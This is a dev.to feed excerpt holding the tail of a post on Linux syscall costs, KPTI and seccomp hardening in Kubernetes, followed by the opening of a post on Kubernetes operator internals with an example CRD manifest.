&lt;p&gt;In January 2018, researchers disclosed &lt;strong&gt;&lt;a href="https://www.redhat.com/en/blog/what-are-meltdown-and-spectre-heres-what-you-need-know" rel="noopener noreferrer"&gt;Meltdown&lt;/a&gt;&lt;/strong&gt; (&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2017-5754" rel="noopener noreferrer"&gt;CVE-2017-5754&lt;/a&gt;), a CPU vulnerability that allowed user-space code to read arbitrary kernel memory by exploiting speculative execution — a CPU optimization where the processor runs instructions ahead of time before determining if they should actually execute. An attacker could use this to read secrets (keys, passwords, tokens) that the kernel had in memory from other processes, all without elevated privileges.&lt;/p&gt;

&lt;p&gt;The fix was &lt;strong&gt;&lt;a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation" rel="noopener noreferrer"&gt;KPTI&lt;/a&gt; (Kernel Page Table Isolation)&lt;/strong&gt;, shipped in Linux 4.15+ and backported to LTS kernels. The idea: keep two completely separate page tables — one for user space (which has no mappings to kernel memory), and one for kernel space (which has full mappings). Before KPTI, both user and kernel code shared a single page table with kernel memory mapped but protected. With KPTI, kernel memory is invisible to user space entirely; there's nothing to speculatively leak.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: KPTI does &lt;em&gt;not&lt;/em&gt; address &lt;strong&gt;Spectre&lt;/strong&gt; (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5753" rel="noopener noreferrer"&gt;CVE-2017-5753&lt;/a&gt;, &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5715" rel="noopener noreferrer"&gt;CVE-2017-5715&lt;/a&gt;), a related but distinct speculative execution vulnerability. Spectre mitigations — &lt;a href="https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/retpoline-branch-target-injection-mitigation.html" rel="noopener noreferrer"&gt;Retpoline&lt;/a&gt; (a compiler technique to prevent speculative indirect branch prediction), &lt;a href="https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html" rel="noopener noreferrer"&gt;IBRS&lt;/a&gt; (microcode that restricts cross-privilege speculative execution), and &lt;a href="https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-predictor-barrier.html" rel="noopener noreferrer"&gt;IBPB&lt;/a&gt; (a barrier that flushes branch predictor state between privilege contexts) — are separate and independently expensive.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;How KPTI makes syscalls more expensive:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;On every user↔kernel transition, the CPU must switch between the two separate page table sets. This is done via the &lt;strong&gt;&lt;a href="https://wiki.osdev.org/Paging" rel="noopener noreferrer"&gt;CR3 register&lt;/a&gt;&lt;/strong&gt; — the control register that points to the currently active page table. A CR3 write forces the CPU to start using a different page table, which inherently invalidates the &lt;strong&gt;&lt;a href="https://en.wikipedia.org/wiki/Translation_lookaside_buffer" rel="noopener noreferrer"&gt;TLB (Translation Lookaside Buffer)&lt;/a&gt;&lt;/strong&gt; — the CPU's cache of recent virtual-to-physical address translations. A cold TLB means the next memory accesses require expensive page table walks instead of cache hits.&lt;/p&gt;

&lt;p&gt;Modern Intel/AMD CPUs support &lt;strong&gt;&lt;a href="https://en.wikipedia.org/wiki/Translation_lookaside_buffer#PCID" rel="noopener noreferrer"&gt;PCID (Process Context Identifiers)&lt;/a&gt;&lt;/strong&gt;, a hardware feature that tags TLB entries with a context ID so the CPU can maintain TLB entries for multiple address spaces simultaneously. With PCID, a CR3 switch doesn't require flushing the entire TLB — the CPU simply activates a different set of tagged entries. This significantly reduces KPTI's overhead, but the CR3 switch itself still has a cost.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world overhead on PCID-enabled modern CPUs:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Workload type&lt;/th&gt;
&lt;th&gt;KPTI overhead&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Typical Kubernetes API server / web services&lt;/td&gt;
&lt;td&gt;2–10%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Syscall-heavy services (high-RPS Redis, dense I/O pipelines)&lt;/td&gt;
&lt;td&gt;20–30%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pathological microbenchmarks (&amp;gt;1M syscalls/sec/CPU)&lt;/td&gt;
&lt;td&gt;Up to 800%*&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Brendan Gregg, Netflix — a lab scenario, not a production baseline. For most Kubernetes workloads, **5–10% is a realistic planning budget&lt;/em&gt;*.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faacn36i4io7965v59dvj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faacn36i4io7965v59dvj.png" alt="image" width="800" height="93"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the architectural reason &lt;code&gt;io_uring&lt;/code&gt; was designed the way it was (see The &lt;code&gt;io_uring&lt;/code&gt; Problem): by sharing ring buffers between user space and kernel space, applications can submit and complete many I/O operations without a syscall per operation, amortizing KPTI overhead across batches.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Syscall Frequency vs. Batching
&lt;/h3&gt;

&lt;p&gt;Beyond KPTI, the raw number of syscalls a service issues matters independently. The Ring 3→Ring 0→Ring 3 round-trip is not just a page-table cost — it also involves register saves/restores, privilege checks, and kernel stack setup. These are fixed costs per syscall, regardless of how much work is done inside.&lt;/p&gt;

&lt;p&gt;A service making 100,000 small &lt;code&gt;write()&lt;/code&gt; calls is slower than one making 10,000 &lt;code&gt;write()&lt;/code&gt; calls with 10x larger buffers, even if total bytes are identical. This is why Go's &lt;code&gt;bufio.Writer&lt;/code&gt;, Java's &lt;code&gt;BufferedWriter&lt;/code&gt;, and virtually all I/O abstractions exist — they buffer writes in user space and flush in larger chunks, reducing syscall frequency. The actual data movement is the same; the kernel crossing overhead is not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Kubernetes-specific manifestation:&lt;/strong&gt; services with high syscall frequency per RPS are more sensitive to &lt;strong&gt;noisy neighbors&lt;/strong&gt; — other workloads on the same node that drive up syscall contention. A cryptominer running &lt;code&gt;mmap&lt;/code&gt; in a tight loop on the same physical node will degrade your API latency through two mechanisms:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Syscall contention&lt;/strong&gt; — the kernel serializes certain operations; many concurrent syscalls from different containers compete for kernel-internal locks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache pollution&lt;/strong&gt; — frequent KPTI-driven CR3 switches and the kernel code paths they invoke thrash the CPU's L1/L2 instruction and data caches, degrading cache hit rates for your workload's subsequent kernel entries.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This happens even if cgroups are correctly configured for CPU and memory — cgroups do not limit syscall rate or kernel cache footprint.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt; and eBPF-based profiling tools like &lt;a href="https://www.parca.dev/" rel="noopener noreferrer"&gt;Parca&lt;/a&gt; can surface these patterns before they become incidents. Parca attaches to &lt;code&gt;perf_event&lt;/code&gt; hooks to capture continuous CPU flame graphs — if you see kernel time unexpectedly high in your service's profile during a noisy-neighbor incident, syscall pressure is the first thing to investigate.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What a Staff Engineer Should Own
&lt;/h2&gt;

&lt;p&gt;Understanding syscalls isn't just trivia — it maps directly to ownership responsibilities at the platform level.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdotl7h6tc5kpdxujy9lq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdotl7h6tc5kpdxujy9lq.png" alt="image" width="800" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Concrete deliverables a staff engineer should drive:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Syscall baseline per workload class&lt;/strong&gt; — profile what syscalls each service tier actually uses in staging. Use this to inform both seccomp profiles and anomaly detection thresholds.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;seccomp profile graduation pipeline&lt;/strong&gt; — automate the path from &lt;code&gt;RuntimeDefault&lt;/code&gt; → custom profile. Record in staging, diff against baseline, promote on green CI.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Falco rule library with suppression logic&lt;/strong&gt; — raw Falco rules generate alert fatigue. Build suppression for known-safe patterns (init containers, health checks, log rotation) and escalation logic for true positives.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Kernel upgrade policy&lt;/strong&gt; — every kernel version changes the syscall landscape (new &lt;code&gt;io_uring&lt;/code&gt; operations, new &lt;code&gt;bpf&lt;/code&gt; commands). Define a test matrix that validates your seccomp profiles and Falco rules against each kernel version before rollout.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Threat model documentation&lt;/strong&gt; — explicitly document your isolation assumptions. If you're running &lt;code&gt;RuntimeDefault&lt;/code&gt; seccomp on a multi-tenant cluster, you need to acknowledge the residual risk from the ~450 exposed syscalls and justify it against the cost of gVisor or stricter profiles.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Syscall drift detection&lt;/strong&gt; — new application versions routinely introduce new syscalls, especially as third-party dependencies update. A tightened seccomp profile that worked in v1.4.0 can silently break workloads in v1.5.0 when a new library starts calling &lt;code&gt;io_uring_setup&lt;/code&gt; or &lt;code&gt;getrandom&lt;/code&gt;. A production platform should automatically detect syscall drift during canary deployments — compare the observed syscall set against the approved profile baseline and surface divergences before the canary promotes to production. Tools like &lt;code&gt;inspektor-gadget&lt;/code&gt; and Falco's audit mode can instrument this automatically.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The Linux man-pages project&lt;/strong&gt; — &lt;code&gt;man 2 syscall&lt;/code&gt; and individual syscall man pages are the authoritative reference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;"Linux Kernel Development" — Robert Love&lt;/strong&gt; — best single-volume reference for kernel internals&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Brendan Gregg's BPF Performance Tools&lt;/strong&gt; — the canonical reference for eBPF-based observability&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://gvisor.dev/docs/" rel="noopener noreferrer"&gt;gVisor design docs&lt;/a&gt;&lt;/strong&gt; — deep dive on the Sentry and Gofer architecture&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Falco documentation&lt;/strong&gt; — rule writing, driver selection, deployment patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2019-5736" rel="noopener noreferrer"&gt;CVE-2019-5736&lt;/a&gt;, &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt;&lt;/strong&gt; — read the original PoC write-ups, not just the summaries. Tracing the syscall sequence of a real exploit is the fastest way to internalize why this layer matters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cilium's eBPF documentation&lt;/strong&gt; — &lt;a href="https://docs.cilium.io" rel="noopener noreferrer"&gt;docs.cilium.io&lt;/a&gt; — best practical reference for eBPF in a Kubernetes context&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;io_uring&lt;/code&gt; and security&lt;/strong&gt; — Lord et al., "An Analysis of the &lt;code&gt;io_uring&lt;/code&gt; Attack Surface" (2022); Jann Horn's CVE write-ups at chromium.googlesource.com; gVisor's rationale for disabling it by default&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;If you're running Kubernetes in production and the words "seccomp profile" don't appear in your threat model, that's the gap to close first. Everything else in this post is the foundation for understanding why.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at - &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>sre</category>
      <category>infrastructure</category>
      <category>linux</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>Kubernetes Operators: A Deep Dive into the Internals</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Wed, 25 Feb 2026 18:55:44 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/kubernetes-operators-a-deep-dive-into-the-internals-221m</link>
      <guid>https://dev.to/piyushjajoo/kubernetes-operators-a-deep-dive-into-the-internals-221m</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Written from the perspective of a senior engineer who has built, debugged, and battle-tested operators in production.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Why Operators Exist&lt;/li&gt;
&lt;li&gt;The Conceptual Foundation: Control Theory&lt;/li&gt;
&lt;li&gt;Kubernetes API Machinery: The Backbone&lt;/li&gt;
&lt;li&gt;Custom Resource Definitions (CRDs)&lt;/li&gt;
&lt;li&gt;The Controller Runtime: Inside the Engine&lt;/li&gt;
&lt;li&gt;Informers, Listers, and the Cache&lt;/li&gt;
&lt;li&gt;The Reconciliation Loop in Depth&lt;/li&gt;
&lt;li&gt;Work Queues and Rate Limiting&lt;/li&gt;
&lt;li&gt;Watches, Events, and Predicates&lt;/li&gt;
&lt;li&gt;Ownership, Finalizers, and Garbage Collection&lt;/li&gt;
&lt;li&gt;Status Subresource and Conditions&lt;/li&gt;
&lt;li&gt;Generation vs ObservedGeneration: A Deep Dive&lt;/li&gt;
&lt;li&gt;Concurrency, MaxConcurrentReconciles, and Cache Scoping&lt;/li&gt;
&lt;li&gt;Leader Election&lt;/li&gt;
&lt;li&gt;Webhooks: Admission and Conversion&lt;/li&gt;
&lt;li&gt;Operator Patterns and Anti-Patterns&lt;/li&gt;
&lt;li&gt;Observability and Debugging&lt;/li&gt;
&lt;li&gt;Production Considerations&lt;/li&gt;
&lt;li&gt;Ready to Build Your Own Operator&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Operators Exist
&lt;/h2&gt;

&lt;p&gt;Before we dive into internals, let's get philosophical for a moment. Kubernetes gives you primitives: Pods, Deployments, Services, ConfigMaps. These are general-purpose building blocks. They're powerful, but they're &lt;em&gt;dumb&lt;/em&gt; — they don't understand your application's operational semantics.&lt;/p&gt;

&lt;p&gt;Consider a PostgreSQL cluster. A skilled DBA knows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How to perform a rolling upgrade without downtime&lt;/li&gt;
&lt;li&gt;When and how to promote a standby to primary during a failure&lt;/li&gt;
&lt;li&gt;How to orchestrate backups in a consistent way&lt;/li&gt;
&lt;li&gt;How to resize volumes without data loss&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of this knowledge lives in native Kubernetes. An &lt;strong&gt;Operator&lt;/strong&gt; is the mechanism to &lt;em&gt;codify operational expertise&lt;/em&gt; into software that runs inside your cluster and manages resources on your behalf.&lt;/p&gt;

&lt;p&gt;The formal definition: An Operator is a &lt;strong&gt;custom controller&lt;/strong&gt; that manages &lt;strong&gt;Custom Resources&lt;/strong&gt; to automate complex, stateful application lifecycle management.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Conceptual Foundation: Control Theory
&lt;/h2&gt;

&lt;p&gt;Every operator is, at its core, an implementation of a &lt;strong&gt;closed-loop control system&lt;/strong&gt; — specifically what control engineers call a &lt;em&gt;feedback control loop&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu082l9aa1czm4qpc0egv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu082l9aa1czm4qpc0egv.png" alt="image" width="800" height="138"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The three core concepts are:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Desired State&lt;/strong&gt; — What you declare in your Custom Resource (the &lt;code&gt;spec&lt;/code&gt; field). This is immutable intent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Observed State&lt;/strong&gt; — What's actually running in the cluster right now (the &lt;code&gt;status&lt;/code&gt; field plus the state of managed child resources).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reconciliation&lt;/strong&gt; — The act of computing the delta between desired and observed state, then taking actions to close that gap.&lt;/p&gt;

&lt;p&gt;Controllers are &lt;em&gt;implemented on top of event streams&lt;/em&gt; (watch events from the Kubernetes API), but their reconciliation logic is &lt;strong&gt;level-based, not edge-triggered&lt;/strong&gt;. The trigger is event-driven; the behavior is not. Rather than reacting once to a specific event, the controller always asks "is the world in the state I want?" and drives toward that state regardless of how many events fired. This distinction matters enormously for resilience: if you miss an event, the next reconciliation catches it anyway. Contrast this with a purely edge-triggered system where a missed event means a missed action — permanently.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Kubernetes API Machinery: The Backbone
&lt;/h2&gt;

&lt;p&gt;Before building or understanding operators, you need a solid mental model of how the Kubernetes API server works.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1egh0suv8i9m4d30v0og.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1egh0suv8i9m4d30v0og.png" alt="image" width="444" height="2049"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every object in Kubernetes is stored in &lt;strong&gt;etcd&lt;/strong&gt; as a versioned, typed resource. The API server exposes these objects via a RESTful interface. Critically, the API server supports a &lt;strong&gt;Watch&lt;/strong&gt; mechanism — clients can subscribe to a stream of events for any resource type.&lt;/p&gt;

&lt;p&gt;The watch stream delivers three event types: &lt;code&gt;ADDED&lt;/code&gt;, &lt;code&gt;MODIFIED&lt;/code&gt;, &lt;code&gt;DELETED&lt;/code&gt;. These are the raw signals your controller eventually acts on, though — as we'll see — the controller runtime abstracts this considerably.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resource Versions&lt;/strong&gt; are central to the concurrency model. Every object has a &lt;code&gt;resourceVersion&lt;/code&gt; field — an opaque string used for optimistic concurrency control. It is derived from etcd's internal revision mechanism, but clients must always treat it as opaque: never parse it, compare it numerically, or make assumptions about its format. When you update an object, you must send the current &lt;code&gt;resourceVersion&lt;/code&gt; to guarantee a compare-and-swap, preventing lost updates in concurrent environments.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Custom Resource Definitions
&lt;/h2&gt;

&lt;p&gt;CRDs are how you extend the Kubernetes API. When you apply a CRD, the API server dynamically registers new API endpoints, enables storage in etcd, and starts serving your custom resources as first-class API objects.&lt;/p&gt;

&lt;p&gt;A CRD has several important structural components:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;apiextensions.k8s.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CustomResourceDefinition&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;databases.mycompany.io&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;group&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mycompany.io&lt;/span&gt;
  &lt;span class="na"&gt;names&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Database&lt;/span&gt;
    &lt;span class="na"&gt;plural&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;databases&lt;/span&gt;
    &lt;span class="na"&gt;singular&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;database&lt;/span&gt;
    &lt;span class="na"&gt;shortNames&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;db"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;scope&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Namespaced&lt;/span&gt;
  &lt;span class="na"&gt;versions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1alpha1&lt;/span&gt;
      &lt;span class="na"&gt;served&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;storage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;schema&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;openAPIV3Schema&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="c1"&gt;# Structural schema for validation&lt;/span&gt;
      &lt;span class="na"&gt;subresources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;           &lt;span class="c1"&gt;# Enables /status subresource&lt;/span&gt;
        &lt;span class="na"&gt;scale&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;               &lt;span class="c1"&gt;# Optional: enables /scale subresource&lt;/span&gt;
          &lt;span class="na"&gt;specReplicasPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.spec.replicas&lt;/span&gt;
          &lt;span class="na"&gt;statusReplicasPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.status.replicas&lt;/span&gt;
      &lt;span class="na"&gt;additionalPrinterColumns&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Phase&lt;/span&gt;
          &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;string&lt;/span&gt;
          &lt;span class="na"&gt;jsonPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.status.phase&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The &lt;code&gt;status&lt;/code&gt; subresource&lt;/strong&gt; deserves special attention. When enabled, &lt;code&gt;spec&lt;/code&gt; and &lt;code&gt;status&lt;/code&gt; become separately updatable — meaning only the controller should write to &lt;code&gt;status&lt;/code&gt;, and users should only write to &lt;code&gt;spec&lt;/code&gt;. This enforces a clean separation of intent vs. observation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Structural Schema&lt;/strong&gt; is mandatory since &lt;code&gt;apiextensions.k8s.io/v1&lt;/code&gt; (Kubernetes 1.16+). Non-structural schemas are rejected by the API server. The &lt;code&gt;openAPIV3Schema&lt;/code&gt; field defines the shape of your resource and enables server-side validation — every field must be described. This prevents garbage data from entering your system.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Controller Runtime: Inside the Engine
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;controller-runtime&lt;/code&gt; library (used by both Kubebuilder and Operator SDK) provides the scaffolding that most operators are built on. Let's dissect what it gives you.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90iiw0s6l08fwhdbo3g4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90iiw0s6l08fwhdbo3g4.png" alt="image" width="800" height="342"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Manager&lt;/strong&gt; is the top-level orchestrator. It:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Manages a shared &lt;strong&gt;cache&lt;/strong&gt; (backed by informers) for all resource types your controllers care about&lt;/li&gt;
&lt;li&gt;Provides a &lt;strong&gt;client&lt;/strong&gt; that reads from the local cache and writes directly to the API server&lt;/li&gt;
&lt;li&gt;Runs all controllers in goroutines&lt;/li&gt;
&lt;li&gt;Handles leader election&lt;/li&gt;
&lt;li&gt;Exposes health check and metrics endpoints&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Cache&lt;/strong&gt; is the performance secret. Rather than every reconciliation hitting the API server, reads go to a local in-memory store that is kept in sync via informers. This reduces API server load dramatically and makes your operator fast.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Client&lt;/strong&gt; has two personalities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reader&lt;/strong&gt; (cache-backed): Fast, eventually consistent. Used for &lt;code&gt;Get&lt;/code&gt; and &lt;code&gt;List&lt;/code&gt; operations during reconciliation. If you need strong consistency at a specific checkpoint, you can bypass the cache by constructing an uncached client — but do so sparingly, as it adds latency and API server load.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Writer&lt;/strong&gt; (direct to API): Used for &lt;code&gt;Create&lt;/code&gt;, &lt;code&gt;Update&lt;/code&gt;, &lt;code&gt;Patch&lt;/code&gt;, &lt;code&gt;Delete&lt;/code&gt;, and &lt;code&gt;Status().Update()&lt;/code&gt;. These always go directly to the API server, never through the cache.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Informers, Listers, and the Cache
&lt;/h2&gt;

&lt;p&gt;This is where things get really interesting from an internals perspective. The &lt;strong&gt;Informer&lt;/strong&gt; is the heart of the watch machinery.&lt;/p&gt;

